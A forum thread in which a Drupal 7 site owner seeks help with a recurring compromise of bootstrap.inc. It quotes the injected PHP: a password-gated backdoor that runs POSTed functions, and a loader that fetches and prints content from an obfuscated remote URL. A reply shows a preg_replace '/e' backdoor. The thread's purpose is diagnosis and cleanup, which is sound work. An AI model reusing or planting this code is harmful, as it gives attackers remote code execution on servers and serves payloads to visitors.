我的托管服务提供商警告我,我的bootstrap.inc文件正在连接到受感染的主机。该问题应该发生在 771 和 808 行包含/bootstrap.inc 文件(代码如下)之间。
这个文件不知何故不断变化(每周一次),从 120kb 到 123kbs。无论这种情况发生在哪里,我都会尝试上传一个干净的文件。如果文件被更改/黑客入侵,我的托管响应会长 10-15 秒。
drupal 7 更新到 7.41,模块是最新的。导致问题的代码介于这些行之间(我怀疑它是"cookie"部分)。这是我的托管服务提供商警告我的受感染/添加部分:
$_passssword = '2505363ea355401256fe974720d85db8';
$p = $_POST;
if (@$p[$_passssword] AND @$p['a'] AND @$p['c']) @$p[$_passssword](@$p['a'], @$p['c'], '');
if (!empty($_GET['check']) AND $_GET['check'] == $_passssword) {
echo('<!--checker_start ');
$tmp = request_url_data('http://maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css');
echo(substr($tmp, 50));
echo(' checker_end-->');
}
unset($_passssword);
$bad_url = false;
foreach (array('/.css$/', '/.swf$/', '/.ashx$/', '/.docx$/', '/.doc$/', '/.xls$/', '/.xlsx$/', '/.xml$/', '/.jpg$/', '/.pdf$/', '/.png$/', '/.gif$/', '/.ico$/', '/.js$/', '/.txt$/', '/ajax/', '/cron.php$/', '/wp-login.php$/', '//wp-includes//', '//wp-admin/', '//admin//', '//wp-content//', '//administrator//', '/phpmyadmin/i', '/xmlrpc.php/', '//feed//') as $regex) {
if (preg_match($regex, $_SERVER['REQUEST_URI'])) {
$bad_url = true;
break;
}
}
$cookie_name = 'PHP_SESSION_PHP';
if (!$bad_url AND !isset($_COOKIE[$cookie_name]) AND empty($echo_done) AND !empty($_SERVER['HTTP_USER_AGENT']) AND (substr(trim($_SERVER['REMOTE_ADDR']), 0, 6) != '74.125') AND !preg_match('/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i', $_SERVER['HTTP_USER_AGENT'])) {
// setcookie($cookie_name, mt_rand(1, 1024), time() + 60 * 60 * 24 * 7, '/');
// $url = base64_decode('a3d3czksLDA2LTs0LTUwLToxLGFvbGQsPGJvc2tiJXZ3blxwbHZxYGY+NDMwMDc5NDsyMjcyOTI6MjE=');
$url = decrypt_url('a3d3czksLDA2LTs0LTUwLToxLGFvbGQsPGJvc2tiJXZ3blxwbHZxYGY+NDMwMDc5NDsyMjcyOTI6MjE=');
$code = request_url_data($url);
// if (!empty($code) AND base64_decode($code) AND preg_match('#[a-zA-Z0-9+/]+={0,3}#is', $code, $m)) {
if (($code = request_url_data($url)) AND $decoded = base64_decode($code, true)) {
$echo_done = true;
print $decoded;
}
}//iend
我不是后端开发人员,我已经将引导用于爱好相关项目超过 8 年了。
我试图清理 D7(重新上传了新的包含、模块和除/sites/之外的所有内容)。尝试在一些流行的扫描仪上检查这一点。
有没有人知道,如何阻止对 bootstrap.inc 的此更改?是否有任何成功的工具或扫描模块?或者,也许有人认识到了该漏洞,并可以给我一个提示,它来自哪里?
提前谢谢你。
我在我的Drupal网站上也有同样的黑客攻击。他们放在bootstrap.inc文件中的代码看起来和你的几乎一样。
除了对bootstrap.inc的更改之外,黑客还在各种模块中安装了多个后门。我能够使用黑客模块找到后门,该模块允许您查找修改后的文件。
我的Drupal中的后门看起来类似于以下代码:
<?php @preg_replace('/(.*)/e', @$_POST['ttqdgkkfkolmt'], '');
此代码使用 preg_replace 中的漏洞,该漏洞允许攻击者使用简单的 HTTP post 请求执行随机 PHP 代码。(preg_replace漏洞在 PHP 版本> 5.5 中得到解决)
希望这有帮助。祝你好运找到后门!